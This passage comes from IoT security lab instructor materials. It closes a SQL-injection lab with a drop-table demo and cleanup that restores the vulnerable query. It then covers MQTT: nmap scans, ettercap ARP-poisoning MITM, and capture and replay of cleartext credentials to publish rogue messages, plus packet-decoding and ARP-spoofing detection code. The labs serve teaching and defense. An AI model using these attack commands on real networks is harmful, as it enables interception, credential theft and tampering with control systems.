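    """Preferred fix: placeholders keep the data out of the SQL grammar entirely."""
    db.execute("insert into sensors(name,temperature) values (?, ?)", (sensor_name, temp_str))
    db.commit()


def sensors_table_exists(db: sqlite3.Connection) -> bool:
    row = db.execute(
        "select name from sqlite_master where type='table' and name='sensors'").fetchone()
    return row is not None


def stored_temperatures(db: sqlite3.Connection) -> list:
    return [r[0] for r in db.execute("select temperature from sensors order by id")]


def demo() -> dict:
    """Run a normal post and then the drop-table payload through each variant."""
    results = {}
    for label, add in (("vulnerable", add_vulnerable),
                       ("escaped", add_escaped),
                       ("parameterized", add_parameterized)):
        db = fresh_db()
        add(db, "Kitchen", "40")            # a normal post, as in Part 1 Step 4
        add(db, "1", DROP_TABLE_PAYLOAD)    # the Part 3 attack
        alive = sensors_table_exists(db)
        results[f"{label}_table_survives"] = alive
        results[f"{label}_rows"] = stored_temperatures(db) if alive else []
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the concatenated query the table is gone after the second call; with the escaped and the parameterized
queries the payload is stored as an ordinary (if odd-looking) temperature string and the table survives.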

Part 5: Clean Up
In this part of the lab you will return the Raspberry Pi to its default configuration.

Step 1: Remove the UFW rules that were created in this lab.
You can delete the rules by issuing the ufw reset command. This will deactivate ufw and remove all rules.
(pl-app) root@myPi:/home/pi/notebooks# ufw reset
Resetting all rules to installed defaults. Proceed with operation (y|n)? y
Backing up 'before6.rules' to '/etc/ufw/before6.rules.20181220_152657'
Backing up 'user.rules' to '/etc/ufw/user.rules.20181220_152657'
Backing up 'before.rules' to '/etc/ufw/before.rules.20181220_152657'
Backing up 'after.rules' to '/etc/ufw/after.rules.20181220_152657'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20181220_152657'
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20181220_152657'

(pl-app) root@myPi:/home/pi/notebooks# ufw status
Status: inactive

Step 2: Return app.py to its original version.


a. Edit the app.py script in nano as was done above. Remove the comment character from line 67 and add it
to line 68.
query="insert into sensors(name,temperature) values ('" + sensor_name + "','" + sensorTempStr + "');"
#query="insert into sensors(name,temperature) values ('" + db.escape_string(sensor_name).decode("UTF-8") + "','" + db.escape_string(sensorTempStr).decode("UTF-8") + "');"
b. Save the file and exit nano.
c. Navigate to the SSH session running Python and press Ctrl+C to stop it. Or enter the command
pkill python at the PL-App web terminal to terminate the Python process.

Step 3: Delete files and folders


In the Kali VM, delete the hidden .sqlmap folder and the vulnerable_app_results folders.
root@kali:~# rm -r vulnerable_app_results* .sqlmap/

Lab - Hacking MQTT (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Required Resources
• 3 Raspberry Pi 3 devices, Model B or later
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi Devices
• A Network Switch

Objectives
Part 1: Setting up a Publishing/Subscriber MQTT Infrastructure
Part 2: Sniffing Data using Kali
Part 3: Adding Username/Password Authentication
Part 4: Adding TLS protection

Background/Scenario
Message queuing telemetry transport (MQTT) is an extremely simple and lightweight publish/subscribe
messaging protocol. It is designed for IoT devices and uses minimal bandwidth and device resources. MQTT
is an ideal protocol for machine-to-machine (M2M) communications. MQTT uses the registered TCP port 1883
by default. When running over TLS (often still called SSL), it uses the registered TCP port 8883.
The MQTT protocol uses topics as a communication avenue. MQTT topics use a hierarchical structure, similar
to a file path. The structure is used for message filtering and routing. An MQTT client can subscribe to one
topic or multiple topics using the wildcards # and +. MQTT does not allow publishing to topics using wildcards.
You can only publish to an individual topic. A published topic can be the output data from a sensor, for
example.
The MQTT broker is the server that handles communications between the publisher and subscriber. The
broker is responsible for receiving and filtering all messages and deciding which devices are interested in
which messages based on the message topic. The broker sends the messages to the clients that have
subscribed to the topic of the message.
In this lab, you will set up an MQTT infrastructure that includes a broker, publisher, and subscriber. You will
also publish MQTT messages and subscribe to MQTT topics. You will also secure MQTT communications
using username and password credentials and transport layer security (TLS). Finally, you will attack the
MQTT infrastructure by trying to intercept the MQTT communications between the clients and broker.
Instructor Note: This lab requires three Raspberry Pi devices that are configured in separate terminals
through PL-App. A fourth terminal is required to be open on the Kali VM. Managing the terminals and entering
the correct commands in the correct terminal may be a challenge for students.
The lab uses Mosquitto clients to create MQTT broker, subscriber, and publisher devices. It may be useful to
have the students become familiar with Mosquitto by visiting the website and looking at the documentation.
The lab also uses Ettercap, which is included in the Kali VM. Ettercap is a very interesting tool for creating
Man-in-the-Middle attacks. Various tutorials about Ettercap are available on the web.

Part 1: Setting up a Publishing/Subscriber MQTT Infrastructure


In this part of the lab, you will set up an MQTT broker server. You will also subscribe to and publish MQTT
messages.

Step 1: Set up your topology.


In this lab, you will need to create a local network that consists of 3 Raspberry Pi devices, a network switch,
and a PC running the IoTSec Kali VM.
a. Connect the network as shown in the topology diagram. Do not power up the Raspberry Pi devices yet.
b. Start the IoTSec Kali VM and start DHCP services using the
/root/lab_support_files/scripts/start_dhcp.sh script as was done in previous labs.
c. Power up the Raspberry Pi devices and use the PL-App to determine the IP addresses.
d. Enable and start the SSH service on the Raspberry Pi devices as necessary.
e. Access the three Raspberry Pi devices via SSH as a privileged user, such as pi, from the IoTSec Kali VM.
If possible, arrange the terminal windows so you can view all of them at the same time.

Step 2: Run a local broker server.


In this step, you will start the local broker server to create the MQTT environment. As an example, the
Raspberry Pi broker server is assigned an IP address of 203.0.113.11. The default user, pi, will be used as
the user throughout this lab.
a. From the Kali VM, go to the terminal of the Raspberry Pi that is to serve as the MQTT broker.
b. First, change the prompt of the broker Pi by entering the command export PS1="\u@broker:\w$ ". This will
make it easier to know which MQTT device you are working with.
pi@myPi_1:~ $ export PS1="\u@broker:\w$ "
pi@broker:~$
c. In the terminal for the device that will be the broker, add the non-root privileged user, such as pi, to the
group mosquitto.
pi@broker:~$ sudo adduser pi mosquitto
Adding user `pi' to group `mosquitto' ...
Adding user pi to group mosquitto
Done.
d. The log file for the Mosquitto server should have write permission for the file owner and any users in the
mosquitto group.
pi@broker:~$ sudo chmod 664 /var/log/mosquitto/mosquitto.log
In this case, chmod is supplied an octal value to specify the permissions. What does this octal value
mean?
____________________________________________________________________________________
____________________________________________________________________________________
Each digit is the sum of read (4), write (2) and execute (1) for, in order, the file owner, the group, and
everyone else. 664 therefore gives the owner and the mosquitto group read and write permission, and gives
others read-only permission.
e. Verify that the permissions have changed for mosquitto.log.
pi@broker:~$ ls -l /var/log/mosquitto/mosquitto.log
-rw-rw-r-- 1 mosquitto mosquitto 41232 Jul 7 21:26 /var/log/mosquitto/mosquitto.log
f. Start the broker server on the broker Raspberry Pi using the command mosquitto.
pi@broker:~$ mosquitto -v
1530599037: mosquitto version 1.4.10 (build date Fri, 22 Dec 2017 08:19:25
+0000) starting
1530599037: Using default config.
1530599037: Opening ipv4 listen socket on port 1883.
1530599037: Opening ipv6 listen socket on port 1883.
g. Leave the broker server process running in the terminal.

Step 3: Subscribe to a topic and publish MQTT messages.


a. On the Kali VM, go to the terminal for the device that will be the subscriber.
b. Change the prompt by entering the command export PS1="\u@subscriber:\w$ ".
pi@myPi_2:~$ export PS1="\u@subscriber:\w$ "
pi@subscriber:~$
c. Start the subscriber client using the command mosquitto_sub. The command includes the topic. The
broker will send MQTT messages in the topic to the subscriber when messages are published to that
topic. Provide the IP address of the broker Pi to the command.
pi@subscriber:~$ mosquitto_sub -d -h 203.0.113.11 -t cisco/iots/user
Client mosqsub/783-subscriber sending CONNECT
Client mosqsub/783-subscriber received CONNACK
Client mosqsub/783-subscriber sending SUBSCRIBE (Mid: 1, Topic:
cisco/iots/user, QoS: 0)
Client mosqsub/783-subscriber received SUBACK
Subscribed (mid: 1): 0
d. Leave the subscriber client process running in the terminal.


e. Go to the terminal for the device that will serve as the MQTT publisher. Change the prompt by entering
the command export PS1="\u@publisher:\w$ ".
pi@myPi_3:~$ export PS1="\u@publisher:\w$ "
pi@publisher:~$
f. The publisher sends MQTT messages using the command mosquitto_pub. Messages are sent to the
broker. The broker distributes the message to the appropriate subscribers for the topic.
pi@publisher:~$ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This
message has been sent over MQTT"
Client mosqpub/1593-publisher sending CONNECT
Client mosqpub/1593-publisher received CONNACK
Client mosqpub/1593-publisher sending PUBLISH (d0, q0, r0, m1,
'cisco/iots/user', ... (36 bytes))
Client mosqpub/1593-publisher sending DISCONNECT
Using the man pages or other resources, what is the topic for these MQTT messages?
____________________________________________________________________________________
cisco/iots/user
g. You should see the MQTT message appear in the subscriber terminal along with a number of MQTT
status messages.
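The mosquitto_pub output above shows a CONNECT followed by a PUBLISH carrying a 36-byte message. The
following Python script is an added example, not from the lab or the Mosquitto project: it builds those two
MQTT 3.1.1 packets byte for byte and decodes them as a passive observer on TCP port 1883 would, which is
exactly what the sniffing in Part 2 captures. The packet layout follows the MQTT 3.1.1 specification; the
client id, username and password are constructed values and the function names are ours.

```python
"""Added example (not from the lab or Mosquitto): build the MQTT 3.1.1 CONNECT
and PUBLISH packets mosquitto_pub sends, then decode them as a sniffer on
TCP/1883 would. Layout follows the MQTT 3.1.1 spec; helper names are ours."""
import struct


def utf8_field(text: str) -> bytes:
    """MQTT string: 2-byte big-endian length, then UTF-8 bytes."""
    data = text.encode("utf-8")
    return struct.pack("!H", len(data)) + data


def encode_remaining_length(n: int) -> bytes:
    """Variable-length integer: 7 bits per byte, high bit set when more bytes follow."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)


def decode_remaining_length(buf: bytes, pos: int):
    """Inverse of encode_remaining_length; returns (value, offset after it)."""
    value, multiplier = 0, 1
    while True:
        byte, pos = buf[pos], pos + 1
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, pos
        multiplier *= 128


def build_connect(client_id: str, username=None, password=None, keepalive: int = 60) -> bytes:
    """CONNECT (type 1). Connect flags: bit 7 username, bit 6 password, bit 1 clean session."""
    flags, payload = 0x02, utf8_field(client_id)
    if username is not None:
        flags |= 0x80
        payload += utf8_field(username)
    if password is not None:
        flags |= 0x40
        payload += utf8_field(password)   # sent as plain bytes: no hashing, no encryption
    body = utf8_field("MQTT") + bytes([4, flags]) + struct.pack("!H", keepalive) + payload
    return bytes([0x10]) + encode_remaining_length(len(body)) + body


def build_publish(topic: str, message: str, qos: int = 0, packet_id: int = 1,
                  retain: bool = False) -> bytes:
    """PUBLISH (type 3). Fixed-header flags: DUP bit 3, QoS bits 2-1, RETAIN bit 0.
    A packet identifier follows the topic only for QoS 1 or 2."""
    body = utf8_field(topic)
    if qos:
        body += struct.pack("!H", packet_id)
    body += message.encode("utf-8")
    return bytes([0x30 | (qos << 1) | int(retain)]) + encode_remaining_length(len(body)) + body


def decode_packet(pkt: bytes) -> dict:
    """Parse a CONNECT or PUBLISH control packet from raw bytes."""
    ptype, flags = pkt[0] >> 4, pkt[0] & 0x0F
    remaining, pos = decode_remaining_length(pkt, 1)
    body = pkt[pos:pos + remaining]

    def field(p):                       # returns (decoded string, next offset)
        n = struct.unpack("!H", body[p:p + 2])[0]
        return body[p + 2:p + 2 + n].decode("utf-8"), p + 2 + n

    if ptype == 1:
        proto, p = field(0)
        level, cflags = body[p], body[p + 1]
        keepalive = struct.unpack("!H", body[p + 2:p + 4])[0]
        client_id, p = field(p + 4)
        out = {"type": "CONNECT", "protocol": proto, "level": level,
               "keepalive": keepalive, "client_id": client_id}
        if cflags & 0x04:               # will flag: skip will topic and will message
            for _ in range(2):
                p += 2 + struct.unpack("!H", body[p:p + 2])[0]
        if cflags & 0x80:
            out["username"], p = field(p)
        if cflags & 0x40:
            out["password"], p = field(p)
        return out
    if ptype == 3:
        qos = (flags >> 1) & 0x03
        topic, p = field(0)
        out = {"type": "PUBLISH", "topic": topic, "qos": qos, "retain": bool(flags & 0x01)}
        if qos:
            out["packet_id"], p = struct.unpack("!H", body[p:p + 2])[0], p + 2
        out["message"] = body[p:].decode("utf-8")
        return out
    return {"type": ptype}


if __name__ == "__main__":
    connect = build_connect("mosqpub/1593-publisher", username="pi", password="s3cret")
    publish = build_publish("cisco/iots/user", "This message has been sent over MQTT")
    print(decode_packet(connect))   # credentials readable straight from the bytes
    print(decode_packet(publish))   # topic and the 36-byte message readable too
```

Everything the decoder recovers is read straight from the bytes on the wire. Adding a username and password
authenticates the client to the broker but does not hide the credentials or the messages from a sniffer; only
the TLS listener on port 8883 does that.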

Part 2: Sniffing Data using Kali


In this part of the lab, you will use the IoTSec Kali VM to run a Man-in-the-Middle (MITM) attack on the MQTT
network.

Step 1: MITM attack using Kali on TCP


a. The MQTT broker, publisher, and subscriber can be located using nmap from the IoTSec Kali VM. The broker
listens on port 1883, or on port 8883 when MQTT is using TLS. A hacker could use this reconnaissance method
to learn about the protocols and devices on the target network, focusing on port 1883, which is used by MQTT.
root@kali:~# nmap 203.0.113.0/24 -p 1883
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-09 15:13 EEST
< output omitted >
Nmap scan report for 203.0.113.11
Host is up (0.00034s latency).

PORT     STATE  SERVICE
1883/tcp open   mqtt
MAC Address: B8:27:EB:6D:BD:30 (Raspberry Pi Foundation)

Nmap scan report for 203.0.113.12
Host is up (0.0011s latency).

PORT     STATE  SERVICE
1883/tcp closed mqtt
MAC Address: B8:27:EB:9F:1B:57 (Raspberry Pi Foundation)

Nmap scan report for 203.0.113.13
Host is up (0.00074s latency).

PORT     STATE  SERVICE
1883/tcp closed mqtt
MAC Address: B8:27:EB:E8:81:44 (Raspberry Pi Foundation)
< output omitted >
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.26 seconds
b. After discovering the victim IP addresses, configure Kali to forward traffic between the destination and
source devices which are going to be attacked. This command will enable Kali to forward IP packets that
it will intercept on to the intended destination. In MITM attacks, the MITM device intercepts traffic from a
source and then forwards the traffic to the destination after capturing it. This makes the MITM device
transparent to users.
root@kali:~# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
c. Run the following command to perform a MITM attack between the publisher and the broker server on the
local network. Ettercap enables MITM attacks by ARP poisoning (the arp:remote option): each victim is tricked
into associating the other victim's IP address with the MAC address of the Kali VM, so the packets exchanged
between them pass through Kali, which captures them and forwards them on. The following command stores the
intercepted data in the dump.pcap file. Any other traffic to the Kali VM that is generated while the capture
runs (e.g., SSH) is also saved.
root@kali:~# ettercap -Tq -i eth0 -M arp:remote //203.0.113.11/ //203.0.113.13/ -w dump.pcap
d. Press the spacebar to view the captured packets in real time.
e. Publish another MQTT message.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This message has been sent over MQTT again."
f. To quit Ettercap, press q to stop the capture when the subscriber has received the message.
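The ARP poisoning used in this step leaves a visible trace on the LAN: an IP address suddenly answers from a
different MAC address, and one MAC address starts answering for several IPs. The following detection routine,
added here as an example and not part of the Cisco lab or of Ettercap, runs over a constructed list of ARP
replies (timestamp, sender IP, sender MAC) such as a LAN sensor would record; the broker and publisher MAC
addresses are the ones the nmap scan above reported, and the attacker MAC 08:00:27:aa:bb:cc is made up.

```python
"""Flag ARP replies that rebind an IP address to a new MAC, the symptom of the
ARP-poisoning MITM performed in this step. Constructed example; not Cisco's code."""
from collections import defaultdict

# Constructed sample of (timestamp, sender_ip, sender_mac) taken from ARP replies.
# Lines 1-3: the legitimate Pis. Lines 4-5: a third MAC (constructed attacker
# address) claims both the broker (.11) and the publisher (.13), which is what
# ettercap's arp:remote mode produces. Line 6: a repeated poison for .11.
SAMPLE_ARP_REPLIES = [
    (1.0, "203.0.113.11", "b8:27:eb:6d:bd:30"),
    (1.1, "203.0.113.13", "b8:27:eb:e8:81:44"),
    (2.0, "203.0.113.12", "b8:27:eb:9f:1b:57"),
    (9.5, "203.0.113.11", "08:00:27:aa:bb:cc"),
    (9.5, "203.0.113.13", "08:00:27:aa:bb:cc"),
    (10.5, "203.0.113.11", "08:00:27:aa:bb:cc"),
]


def detect_arp_spoofing(replies):
    """Return a list of alerts for (a) IPs whose MAC binding changes and
    (b) MACs that answer for more than one IP. 'replies' is an iterable of
    (timestamp, ip, mac) tuples in the order they were seen."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        mac_to_ips[mac].add(ip)
        previous = ip_to_mac.get(ip)
        if previous is None:
            ip_to_mac[ip] = mac          # first time we see this IP: learn it
        elif previous != mac:
            alerts.append({"ts": ts, "ip": ip, "old_mac": previous,
                           "new_mac": mac, "reason": "binding changed"})
            ip_to_mac[ip] = mac          # track the latest claim so a flap back is reported too
    # One MAC claiming several IPs is the gateway-and-victim pattern of an ARP MITM.
    # A real router legitimately owns several addresses, so allowlist those in production.
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append({"ts": None, "ip": sorted(ips), "old_mac": None,
                           "new_mac": mac, "reason": "one MAC claims multiple IPs"})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(alert)
```

The same logic is what tools such as arpwatch implement; on a switched IoT network a static ARP entry for the broker
on each client, or Dynamic ARP Inspection on the switch, removes the attack rather than merely detecting it.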

Step 2: View the capture using Wireshark.

a. Open the file dump.pcap using Wireshark.
root@kali:~# wireshark dump.pcap &
b. Apply a display filter so only MQTT-related traffic is shown. Enter mqtt in the display filter field and press
Enter.
c. In Wireshark, expand the packet that is labelled "Publish Message" in the Info column. You should see
that although the Kali VM is not part of the MQTT network it has intercepted the message. Note also that
the MQTT subscriber also received the message as expected. The Kali VM is acting as a man in the
middle and is able to read and save messages that are not intended for it. The Kali VM then forwards the
messages on to the intended recipient, as you will see in the terminal for the subscriber Pi.

Step 3: Publish rogue data.

In the capture, you can see the broker server data, IP address, and port number. In this step, you will publish
rogue data from the IoTSec Kali VM to the MQTT network.
a. Verify that the subscriber is still listening for MQTT messages. If not, use the command to subscribe to
the messages again.
pi@subscriber:~ $ mosquitto_sub -d -h 203.0.113.11 -t cisco/iots/user
b. Publish a rogue message from Kali to the MQTT broker.
root@kali:~# mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This is a rogue message from KALI!"
What message did the MQTT subscriber receive?
____________________________________________________________________________________
This is a rogue message from KALI!
c. Stop the MQTT service on the broker and subscriber by pressing Ctrl+C.
d. Imagine an industrial IoT system in which sensors send data over MQTT from manufacturing equipment.
The sensors act as publishers of data to an MQTT broker. The broker sends the data to subscriber
actuator devices that control safety systems based on the sensor data values that are received. How
could a hacker perform an attack against this network and what could the hacker accomplish?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. If the hacker were able to connect a computer to the network, the hacker could use
Wireshark to determine that MQTT was in use, the IP address of the broker, and the topics that are being
published. The hacker could then publish rogue data that could activate a safety system, perhaps turning
on fire suppression systems or shutting down equipment.

Part 3: Adding Username/Password Authentication

MQTT can use usernames and passwords to authenticate connections.

Step 1: Add a simple username / password authentication mechanism.

a. On the broker Pi, create a local database file that stores the username and passwords. Create a file
named passwords with a single line that contains the following syntax: username:password.
pi@broker:~ $ echo user:myPassword > passwords
b. Verify the content of the file passwords by using any command that can view the content of a text file,
such as cat or more.
pi@broker:~ $ cat passwords
user:myPassword
c. The mosquitto broker requires the passwords in a hash format, so you need to convert the file
passwords using the command mosquitto_passwd.
pi@broker:~ $ mosquitto_passwd -U passwords
pi@broker:~ $ cat passwords
user:$6$BnGSNi8dPHdVraBR$l0TGhVgT54KKb3NoxKmWgq+wdMJLOc7NnCUqSFJj0/Hun3CkmGPHpbQwM+2GqzVUTSRqWX95jnqaJhFZGAXxTw==
d. Copy the mosquitto configuration file named mosquitto_simple_pass.conf from the scripts folder to your
current working directory. Be sure to include the "." after the filename in the command.
pi@broker:~ $ cp /home/pi/notebooks/Course\ Materials/4.\ IoT\ Security/scripts/mosquitto_simple_pass.conf .
e. Run the broker using the configuration file.
pi@broker:~ $ mosquitto -v -c mosquitto_simple_pass.conf
Note: If you received a message “Error: Unable to open log file /var/log/mosquitto/mosquitto.log for
writing.”, you will need to reboot the Pi to release the port that is used by MQTT.
pi@broker:~ $ sudo reboot
f. To test the configuration, try to publish something without the username/password on the publisher client.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This message has been sent over MQTT without authentication."
Client mosqpub/15647-raspberry sending CONNECT
Client mosqpub/15647-raspberry received CONNACK
Connection Refused: not authorised.
Error: The connection was refused.
g. Adding authentication during MQTT message exchange requires extra parameters as shown below. If
you are still subscribed, stop subscribing by pressing Ctrl-C. Restart the subscriber and then start
publishing messages with your configured username and password. After publishing, confirm that the
message was received by the subscriber.
For the subscriber:
pi@subscriber:~ $ mosquitto_sub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user
Client mosqsub/13868-subscribe sending CONNECT
Client mosqsub/13868-subscribe received CONNACK
Client mosqsub/13868-subscribe sending SUBSCRIBE (Mid: 1, Topic: cisco/iots/user, QoS: 0)
Client mosqsub/13868-subscribe received SUBACK
Subscribed (mid: 1): 0
For the publisher:
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user -m "This message has been sent over MQTT using authentication."
Client mosqpub/14203-publisher sending CONNECT
Client mosqpub/14203-publisher received CONNACK
Client mosqpub/14203-publisher sending PUBLISH (d0, q0, r0, m1, 'cisco/iots/user', ... (60 bytes))
Client mosqpub/14203-publisher sending DISCONNECT
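Step c above converts the plain user:myPassword line into a salted hash, so the broker never stores the password
itself. The routine below, added here as an example and not Mosquitto's own code, builds and checks entries in
the $6$ format shown in the lab output. It assumes that format is SHA-512 over the password bytes followed by
12 random salt bytes, with salt and digest base64-encoded (the 16-character salt and 88-character digest in
the lab output have exactly those lengths); confirm the construction against the Mosquitto source before using
it to validate a real password file. Newer Mosquitto releases write a $7$ PBKDF2 variant instead.

```python
"""Create and verify password-file entries in the $6$ (salted SHA-512) form that
mosquitto_passwd -U produced in this lab. Constructed example, not Mosquitto's code;
the exact construction is an assumption (see the lead-in)."""
import base64
import hashlib
import hmac
import os

SALT_LEN = 12  # 12 raw bytes -> 16 base64 characters, matching the lab's salt


def make_entry(username, password, salt=None):
    """Return 'username:$6$<b64 salt>$<b64 sha512(password + salt)>'."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    digest = hashlib.sha512(password.encode("utf-8") + salt).digest()
    return "%s:$6$%s$%s" % (username,
                            base64.b64encode(salt).decode("ascii"),
                            base64.b64encode(digest).decode("ascii"))


def parse_entry(line):
    """Split one password-file line into (username, raw salt, raw digest).
    Raises ValueError for an unhashed 'user:myPassword' line or a foreign format."""
    username, rest = line.rstrip("\n").split(":", 1)
    parts = rest.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "6":
        raise ValueError("unsupported hash format in entry for %r" % username)
    return username, base64.b64decode(parts[2]), base64.b64decode(parts[3])


def verify_password(line, username, password):
    """Constant-time check of a candidate password against a stored entry."""
    stored_user, salt, stored_digest = parse_entry(line)
    if stored_user != username:
        return False
    digest = hashlib.sha512(password.encode("utf-8") + salt).digest()
    return hmac.compare_digest(digest, stored_digest)


def is_hashed(line):
    """True when the line already holds a hash; the pre-conversion form
    'user:myPassword' from step b of this lab returns False."""
    return ":$" in line


if __name__ == "__main__":
    entry = make_entry("user", "myPassword")
    print(entry)
    print("verify ok:", verify_password(entry, "user", "myPassword"))
    print("wrong password:", verify_password(entry, "user", "guess"))
```

The hash protects the stored secret only; as Step 2 shows, the password itself still crosses the network in the
CONNECT packet, which is why Part 4 adds TLS.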

Step 2: Replay attack and publish rogue data.

a. Verify that you are still subscribed to the topic. If not, enter the following command.
pi@subscriber:~ $ mosquitto_sub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user
b. Start the packet capture on IoTSec Kali VM to accomplish an MITM attack and to capture the username
and password in the traffic between the broker and publisher.
root@kali:~# ettercap -Tq -i eth0 -M arp:remote //203.0.113.11/ //203.0.113.13/ -w dump_simple.pcap
c. Go to the terminal on the publisher and issue the following command to send an MQTT message.
pi@publisher:~ $ mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user -m "This message is sent by the publisher using username/password."
Verify that the message has been received by the subscriber. Return to Kali and exit Ettercap by pressing
q.
d. Open the dump_simple.pcap file in Wireshark as was done previously. Filter for MQTT traffic. Open the
Connect Command packet and expand the MQTT data. What vulnerability is exposed here?
____________________________________________________________________________________
The username and password are transmitted in clear text.
e. Now the attacker can assume the role of the publisher and can send MQTT messages with the
intercepted username and password. In another terminal on Kali, enter the command below to send a
message from the MITM device to the broker.
root@kali:~# mosquitto_pub -d -h 203.0.113.11 -u user -P myPassword -t cisco/iots/user -m "This message is sent by Kali using username/password."
Client mosqpub/1817-kali sending CONNECT
Client mosqpub/1817-kali received CONNACK
Client mosqpub/1817-kali sending PUBLISH (d0, q0, r0, m1, 'cisco/iots/user', ... (53 bytes))
Client mosqpub/1817-kali sending DISCONNECT
What message did the subscriber see?
____________________________________________________________________________________
____________________________________________________________________________________
This message is sent by Kali using username/password.
f. Use Ctrl+C in the broker and subscriber terminals to terminate the mosquitto processes.
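What Wireshark shows in Part 2 Step 2 and in step d above follows directly from the MQTT 3.1.1 wire format:
the CONNECT packet carries the client identifier, username and password as length-prefixed strings, and a
QoS 0 PUBLISH carries the topic and the raw payload, with no encryption of any of it. The decoder below is an
added example, not part of the Cisco lab or of Mosquitto. It builds a constructed byte stream equivalent to the
publisher's session (CONNECT, PUBLISH, DISCONNECT, with the lab's user/myPassword credentials and
cisco/iots/user topic) and then parses it the way a passive sensor would parse the reassembled TCP payload
from the capture.

```python
"""Encode and decode MQTT 3.1.1 CONNECT / PUBLISH / DISCONNECT packets to show
why a capture of an unencrypted MQTT session exposes credentials and payloads.
Constructed example; not Cisco's or Mosquitto's code."""
import struct


def _encode_remaining_length(n):
    """MQTT variable-length integer: 7 bits per byte, high bit = more follows."""
    out = bytearray()
    while True:
        byte = n % 128
        n //= 128
        if n > 0:
            byte |= 0x80
        out.append(byte)
        if n == 0:
            return bytes(out)


def _decode_remaining_length(buf, i):
    value, multiplier = 0, 1
    while True:
        byte = buf[i]
        i += 1
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, i
        multiplier *= 128
        if multiplier > 128 ** 3:            # spec allows at most 4 bytes
            raise ValueError("malformed remaining length")


def _mqtt_string(s):
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def _read_string(buf, i):
    (n,) = struct.unpack_from(">H", buf, i)
    i += 2
    return buf[i:i + n].decode("utf-8"), i + n


def build_connect(client_id, username=None, password=None, keepalive=60):
    flags = 0x02                               # clean session
    payload = _mqtt_string(client_id)
    if username is not None:
        flags |= 0x80                          # username flag
        payload += _mqtt_string(username)
    if password is not None:
        flags |= 0x40                          # password flag
        payload += _mqtt_string(password)
    body = _mqtt_string("MQTT") + bytes([0x04, flags]) + struct.pack(">H", keepalive) + payload
    return bytes([0x10]) + _encode_remaining_length(len(body)) + body


def build_publish(topic, message):
    body = _mqtt_string(topic) + message.encode("utf-8")   # QoS 0: no packet identifier
    return bytes([0x30]) + _encode_remaining_length(len(body)) + body


DISCONNECT = bytes([0xE0, 0x00])


def parse_packets(stream):
    """Decode a reassembled client-to-broker byte stream into a list of dicts."""
    packets, i = [], 0
    while i < len(stream):
        ptype, flags = stream[i] >> 4, stream[i] & 0x0F
        length, i = _decode_remaining_length(stream, i + 1)
        body, i = stream[i:i + length], i + length
        if ptype == 1:                                    # CONNECT
            _, j = _read_string(body, 0)                  # protocol name "MQTT"
            cflags = body[j + 1]                          # body[j] is the protocol level
            j += 4                                        # level, flags, keepalive
            client_id, j = _read_string(body, j)
            pkt = {"type": "CONNECT", "client_id": client_id, "username": None, "password": None}
            if cflags & 0x04:                             # will flag: skip will topic + message
                _, j = _read_string(body, j)
                _, j = _read_string(body, j)
            if cflags & 0x80:
                pkt["username"], j = _read_string(body, j)
            if cflags & 0x40:
                pkt["password"], j = _read_string(body, j)
            packets.append(pkt)
        elif ptype == 3:                                  # PUBLISH
            qos = (flags >> 1) & 0x03
            topic, j = _read_string(body, 0)
            if qos > 0:
                j += 2                                    # packet identifier present for QoS 1/2
            packets.append({"type": "PUBLISH", "topic": topic, "qos": qos,
                            "payload": body[j:].decode("utf-8", "replace")})
        elif ptype == 14:
            packets.append({"type": "DISCONNECT"})
        else:
            packets.append({"type": "TYPE_%d" % ptype})
    return packets


def find_cleartext_credentials(stream):
    """The detection a sensor would run: every CONNECT carrying a username."""
    return [(p["client_id"], p["username"], p["password"])
            for p in parse_packets(stream) if p["type"] == "CONNECT" and p["username"] is not None]


# Constructed stand-in for the publisher session captured in step b-d above.
SAMPLE_STREAM = (build_connect("mosqpub/14203-publisher", "user", "myPassword")
                 + build_publish("cisco/iots/user",
                                 "This message is sent by the publisher using username/password.")
                 + DISCONNECT)
```

Running find_cleartext_credentials over SAMPLE_STREAM returns the user/myPassword pair exactly as the Connect
Command packet displays it in Wireshark; only the TLS layer added in Part 4 changes that.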

Part 4: Adding TLS Protection

Step 1: Add a TLS layer for data transport.

For a TLS connection to be established, the broker needs a certificate that the subscriber and publisher can
validate. Note that generating certificates and using TLS on a constrained device might take a large amount of
time. The steps for creating the certificates can be found in the Mosquitto documentation.
pi@broker:~ $ man mosquitto-tls
a. Execute the following command to create the required certificates. Note that we are using a self-signed
Certificate Authority and server-side certificates. You can use the script provided by Mosquitto to
generate both the CA and server certificates and key.
On the broker, navigate to your home directory. Copy the CA script from the scripts folder to your home
directory.
pi@broker:~ $ cp /home/pi/notebooks/Course\ Materials/4.\ IoT\ Security/scripts/generate-CA.sh .
b. Change the permission of the script so it can be executed. Run the script.
